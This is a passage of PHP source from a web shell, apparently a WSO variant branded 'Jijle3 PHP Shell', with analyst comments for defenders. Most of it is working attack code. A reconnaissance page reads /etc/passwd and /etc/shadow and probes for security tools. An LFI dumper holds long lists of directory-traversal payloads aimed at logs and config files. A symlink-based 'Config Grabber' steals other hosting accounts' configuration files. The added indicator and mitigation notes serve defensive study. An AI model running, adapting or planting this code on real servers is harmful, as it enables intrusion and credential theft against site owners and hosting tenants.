        while (($entry = readdir($handle)) !== false) {
            $files[] = $entry;
        }
        return $files;
    }
    return scandir($dir);
}
496
// Looks up a program by running `which <name>` through wsoEx().
// Returns the command's output when it is non-empty, otherwise false.
// $p is concatenated into the command line unquoted; the callers visible in this file
// pass fixed program names.
497function wsoWhich($p) {
498 $path = wsoEx('which ' . $p);
499 if(!empty($path))
500 return $path;
501 return false;
502}
503
// "Sec Info" page: prints a host reconnaissance report between wsoHeader() and
// wsoFooter(). Returns nothing.
// It reports the server software, loaded Apache modules, disabled PHP functions,
// open_basedir and safe-mode directories, cURL and database client support. On
// non-Windows hosts it adds whether /etc/passwd and /etc/shadow are readable, the OS
// and distribution strings, which build tools, downloaders and security products are
// installed, disk usage and /etc/hosts. On Windows it runs `ver`, `net accounts` and
// `net user`.
// Analyst note: the $danger list is a roster of antivirus, integrity-checking, firewall
// and IDS program names probed one by one with `which`. A burst of `which` child
// processes spawned by the web-server account within one request is the host-side
// trace of this page.
504function actionSecInfo() {
505 wsoHeader();
506//Sec info
507echo '<h1>Server Security Info</h1><div class=content>';
508?>
509</div>
510</center>
511<?php
// Prints one "name: value" row. Empty values are skipped, and multi-line values go
// into a <pre> block. $v is echoed without HTML escaping.
512 function wsoSecParam($n, $v) {
513 $v = trim($v);
514 if($v) {
515 echo '<span>' . $n . ': </span>';
516 if(strpos($v, "\n") === false)
517 echo $v . '<br>';
518 else
519 echo '<pre class=ml1>' . $v . '</pre>';
520 }
521 }
522
523 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
524 if(function_exists('apache_get_modules'))
525 wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
526 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
527 wsoSecParam('Open base dir', @ini_get('open_basedir'));
528 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
529 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
530 wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
// Database client support is inferred from which connect functions exist.
531 $temp=array();
532 if(function_exists('mysql_get_client_info'))
533 $temp[] = "MySql (".mysql_get_client_info().")";
534 if(function_exists('mssql_connect'))
535 $temp[] = "MSSQL";
536 if(function_exists('pg_connect'))
537 $temp[] = "PostgreSQL";
538 if(function_exists('oci_connect'))
539 $temp[] = "Oracle";
540 wsoSecParam('Supported databases', implode(', ', $temp));
541 echo '<br>';
542
543 if($GLOBALS['os'] == 'nix') {
544 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
545 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
546 wsoSecParam('OS version', @file_get_contents('/proc/version'));
547 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
// The command-based checks below run only when safe_mode is off.
548 if(!$GLOBALS['safe_mode']) {
549 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
550 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
551 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
552 echo '<br>';
// Each list is filtered down to the names that `which` resolves on this host.
553 $temp=array();
554 foreach ($userful as $item)
555 if(wsoWhich($item))
556 $temp[] = $item;
557 wsoSecParam('Userful', implode(', ',$temp));
558 $temp=array();
559 foreach ($danger as $item)
560 if(wsoWhich($item))
561 $temp[] = $item;
562 wsoSecParam('Danger', implode(', ',$temp));
563 $temp=array();
564 foreach ($downloaders as $item)
565 if(wsoWhich($item))
566 $temp[] = $item;
567 wsoSecParam('Downloaders', implode(', ',$temp));
568 echo '<br/>';
569 wsoSecParam('HDD space', wsoEx('df -h'));
570 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
571 }
572 } else {
573 wsoSecParam('OS Version',wsoEx('ver'));
574 wsoSecParam('Account Settings',wsoEx('net accounts'));
575 wsoSecParam('User Accounts',wsoEx('net user'));
576 }
577 echo '</div>';
578 wsoFooter();
579}
580################# Home #################
// "Home" page: a branding banner printed between wsoHeader() and wsoFooter(). It has
// no file or command functionality of its own. Returns nothing.
// Analyst note: the fixed strings here ("Jijle3 PHP Shell v 0.1.8", "Martyrs Crew",
// "Phenomene Dz", the 0zz0.com and gulfup.com image URLs, the Facebook like-box for
// the page "J1jeI") are high-confidence static indicators for this variant. The page
// resolves the Host header with gethostbyname() and puts the resulting IP, or the Host
// header itself, into links to third-party lookup sites.
// The second PHP section opens with the short tag "<?", which is only parsed as PHP
// when short_open_tag is enabled.
581function actionhome() {
582wsoHeader();
583//Home
584echo'
585<center>
586<h1>[ Salam ♥ Alaykoum ]</h1>
587<br /><br />
588</form>
589';
590?><head>
591<body bgcolor="Black"><table width=100% height=100%><td align="center">
592<img src="http://www5.0zz0.com/2014/11/29/18/934285237.png" height="150" title="Martyrs Crew 2015 " width="478" ></img></img><p>
593</img></img><p>
594<span class="style1"><font size="9" color="#FFFFFF" face="Adobe Heiti Std R"></font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="#df5" face="Adobe Heiti Std R">
595Jijle3 PHP Shell v 0.1.8</font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="#FFFFFF" face="Adobe Heiti Std R"></font></span></p>
596<span>[ Say Hamd Li ' Allah ♥ ] </span>
597<p>
598
599<img src="http://im48.gulfup.com/jIm93E.png" height="92" title="Martyrs Crew Index Logo 2014 " width="178" ></p>
600<p>
601<pre>
602<iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FJ1jeI&width&height=62&colorscheme=light&show_faces=false&header=true&stream=false&show_border=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:62px;" allowTransparency="true"></iframe><pre>
603<p>
604<?
// Resolve the Host header to an IP, print it, and reuse it in the links below.
605echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
606echo '</center><br>';
607echo "<br><br><center><b><font face='Tahoma' name=sip color='white' size='2pt'>Jijle3 PHP Web Shell V 0.1.8 (c) Phenomene Dz [ Martyrs Crew ] 2015</font></b></td><font face='Tahoma' color='WHITE' size='2pt' />";
608echo " <b><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">Bing.com
609 </a></b> - <b><a href='http://zone-h.com/archive/ip=".$serverIP."
610' target=\"_blank\">Zone-H.org</a> -  <a href='http://www.yougetsignal.com/tools/web-sites-on-web-server/
611' target=\"_blank\">Yougetsignal.com</a>
612 - <b><a href='http://toolbar.netcraft.com/site_report?url=https://" . $_SERVER['HTTP_HOST'] . "&go=&form=QBLH&filt=all' target=\"_blank\">NetCraft.com
613 </a></b> - <b><a href='https://pentest-tools.com/
614' target=\"_blank\">Pentest-Tools.com</a>
615</b></center><br>";
616wsoFooter();}
617################# End Home #################
618function actionlfiscan() {
619 wsoHeader();
620 print '
621 <h3>Led-Zeppelin\'s LFI File dumper</h3>
622
623 <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
624 LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
625 <option value="1">
626 Access Log
627 </option>
628
629 <option value="2">
630 httpd.conf
631 </option>
632
633 <option value="3">
634 Error Log
635 </option>
636 <option value="4">
637 php.ini
638 </option>
639 <option value="5">
640 MySQL
641 </option>
642 <option value="6">
643 FTP
644 </option>
645 <option value="7">
646 Environ
647 </option>
648 </select> Null: <select name="null">
649 <option value="%00">
650 Yes
651 </option>
652
653 <option value="">
654 No
655 </option>
656 </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
657 </form>';
658 error_reporting(0);
659 if($_POST['lfiurl']) {
660 print "<pre>";
661 $cheader = $_POST['custom_header'];
662 $target = $_POST['lfiurl'];
663 $type = $_POST['scantype'];
664 $byte1 = $_POST['null'];
665 $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
666 $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
667 $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
668 $lfiaccess = array(
669 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
670 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
671 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
672 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
673 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
674 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
675 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
676 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
677 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
678 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
679 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
680 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
681 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
682 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
683 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
684 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
685 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
686 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
687 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
688 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
689 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
690 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
691 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
692
693 $lfierror = array(
694 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
695 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
696 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
697 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
698 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
699 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
700 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
701 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
702 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
703 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
704 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
705 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
706 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
707 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
708 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
709 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
710 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
711 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
712 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
713 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
714 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
715 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
716 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
717
718 $lficonfig = array(
719 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
720 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
721 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
722 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
723 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
724 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
725 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
726 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
727 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
728 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
729 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
730 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
731 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
732 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
733 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
734 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
735 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
736 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
737 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
738 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
739 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
740 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
741 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
742 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
743 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
744 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
745 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
746 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
747 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
748 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
749 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
750 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
751 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
752 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
753 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
754
755 $lfiphpini = array(
756 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
757 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
758 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
759 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
760 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
761 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
762 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
763 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
764 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
765 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
766 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
767 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
768 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
769 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
770 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
771 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
772 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
773 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
774 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
775 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
776 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
777 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
778 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
779 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
780 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
781 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
782 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
783
784 $lfimysql = array(
785 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
786 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
787 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
788 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
789 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
790 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
791 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
792 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
793 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
794 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
795
796 $lfiftp = array(
797 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
798 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
799 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
800 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
801 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
802 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
803 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
804 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
805 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
806 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
807 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
808 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
809 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
810 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
811 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
812 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
813 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
814 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
815 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
816 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
817 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
818 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
819 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
820 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
821 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
822 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
823 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
824 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
825 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
826 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
827 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
828 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
829 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
830 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
831 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
832 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
833 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
834 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
835 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
836 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
837 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
838 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
839 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
840 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
841
842
843 $x = 1;
844 if ( $type == 1 ) {
845 $res1 = FetchURL($target.$lfitest);
846 $res2 = FetchURL($target.$lfitest2);
847 $rhash1 = md5($res1);
848 $rhash2 = md5($res2);
849 if ($rhash1 != $rhash2) {
850 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
851 while($lfiaccess[$x]) {
852 $res3 = FetchURL($target.$lfiaccess[$x]);
853 $rhash3 = md5($res3);
854 if ($rhash3 != $rhash2) {
855 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
856 }
857 else {
858 print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
859 }
860 $x++;
861 }
862 }
863 }
864 if ( $type == 2 ) {
865 $res1 = FetchURL($target.$lfitest);
866 $res2 = FetchURL($target.$lfitest2);
867 $rhash1 = md5($res1);
868 $rhash2 = md5($res2);
869 if ($rhash1 != $rhash2) {
870 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
871 while($lficonfig[$x]) {
872 $res3 = FetchURL($target.$lficonfig[$x]);
873 $rhash3 = md5($res3);
874 if ($rhash3 != $rhash2) {
875 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
876 }
877 else {
878 print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
879 }
880 $x++;
881 }
882 }
883 }
884 if ( $type == 3 ) {
885 $res1 = FetchURL($target.$lfitest);
886 $res2 = FetchURL($target.$lfitest2);
887 $rhash1 = md5($res1);
888 $rhash2 = md5($res2);
889 if ($rhash1 != $rhash2) {
890 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
891 while($lfierror[$x]) {
892 $res3 = FetchURL($target.$lfierror[$x]);
893 $rhash3 = md5($res3);
894 if ($rhash3 != $rhash2) {
895 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
896 }
897 else {
898 print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
899 }
900 $x++;
901 }
902 }
903 }
904 if ( $type == 4 ) {
905 $res1 = FetchURL($target.$lfitest);
906 $res2 = FetchURL($target.$lfitest2);
907 $rhash1 = md5($res1);
908 $rhash2 = md5($res2);
909 if ($rhash1 != $rhash2) {
910 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
911 while($lfiphpini[$x]) {
912 $res3 = FetchURL($target.$lfiphpini[$x]);
913 $rhash3 = md5($res3);
914 if ($rhash3 != $rhash2) {
915 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
916 }
917 else {
918 print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
919 }
920 $x++;
921 }
922 }
923 }
924 if ( $type == 5 ) {
925 $res1 = FetchURL($target.$lfitest);
926 $res2 = FetchURL($target.$lfitest2);
927 $rhash1 = md5($res1);
928 $rhash2 = md5($res2);
929 if ($rhash1 != $rhash2) {
930 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
931 while($lfimysql[$x]) {
932 $res3 = FetchURL($target.$lfimysql[$x]);
933 $rhash3 = md5($res3);
934 if ($rhash3 != $rhash2) {
935 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
936 }
937 else {
938 print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
939 }
940 $x++;
941 }
942 }
943 }
944 if ( $type == 6 ) {
945 $res1 = FetchURL($target.$lfitest);
946 $res2 = FetchURL($target.$lfitest2);
947 $rhash1 = md5($res1);
948 $rhash2 = md5($res2);
949 if ($rhash1 != $rhash2) {
950 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
951 while($lfiftp[$x]) {
952 $res3 = FetchURL($target.$lfiftp[$x]);
953 $rhash3 = md5($res3);
954 if ($rhash3 != $rhash2) {
955 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
956 }
957 else {
958 print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
959 }
960 $x++;
961 }
962 }
963 }
964if ( $type == 7 ) {
965 $res1 = FetchURL($target.$lfitest);
966 $res2 = FetchURL($target.$lfitest2);
967 $rhash1 = md5($res1);
968 $rhash2 = md5($res2);
969 if ($rhash1 != $rhash2) {
970 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
971 $res3 = FetchURL($target.$lfiprocenv);
972 $rhash3 = md5($res3);
973 if ($rhash3 != $rhash2) {
974 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
975 }
976 else {
977 print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
978 }
979 }
980 }
981 }
982 }
983wsoFooter();
984}
985
986###################### Config Grabber ######################
/**
 * Web-shell action "config": collects other accounts' CMS configuration files
 * on a shared host by planting symlinks inside the web root.
 *
 * Flow, as visible below:
 *  - Without a POSTed `config` value it renders a form whose textarea is
 *    pre-filled with the contents of /etc/passwd.
 *  - With `config` POSTed it stops if "symlink" appears in disable_functions;
 *    otherwise it creates and enters `phdz-config/`, appends an .htaccess, and
 *    for every line of the POSTed `passwd` text uses the field before the
 *    first ':' as an account name and symlinks a fixed list of paths under
 *    /home/<user>/public_html/ to `<user>-*.txt` names.
 *
 * Defender notes: the artefacts left on disk are the `phdz-config` directory,
 * its .htaccess and the `<user>-*.txt` symlinks. The approach relies on PHP
 * being able to call symlink() and on the web server following links to files
 * owned by other accounts and honouring Options/handler overrides from
 * .htaccess; owner-match symlink policy, a restricted AllowOverride, per-user
 * PHP isolation and non-world-readable config files each break it.
 */
987 function actionconfig() {
988wsoHeader();
989
990echo "<center>
991<h1>Config Grabber</h1>
992";
993?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="white" size="2pt">Put /etc/passwd</p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd');
994?>
995</textarea><br><br><input name="config" class='inputzbut' size="100" value="Get The Configs !" type="submit"><br><input type="hidden" name="a" value="config"></form></center><br>
996<?php }if ($_POST['config']) {
// The disable_functions setting is only searched for the word "symlink";
// when it is present the request ends with an error message.
// NOTE(review): eregi() was removed in PHP 7.0, so this path dates the sample
// to PHP 5.x hosts.
997$function = $functions=@ini_get("disable_functions");
998if(eregi("symlink",$functions)){die ('<error>Symlink is disabled :( </error>');}@mkdir('phdz-config', 0755);@chdir('phdz-config');
// .htaccess text written into the drop directory: it enables Indexes and
// FollowSymLinks and maps .php/.html to text/plain, which is intended to make
// the server return linked files as source instead of executing them.
999$htaccess="
1000OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
1001Options Indexes FollowSymLinks
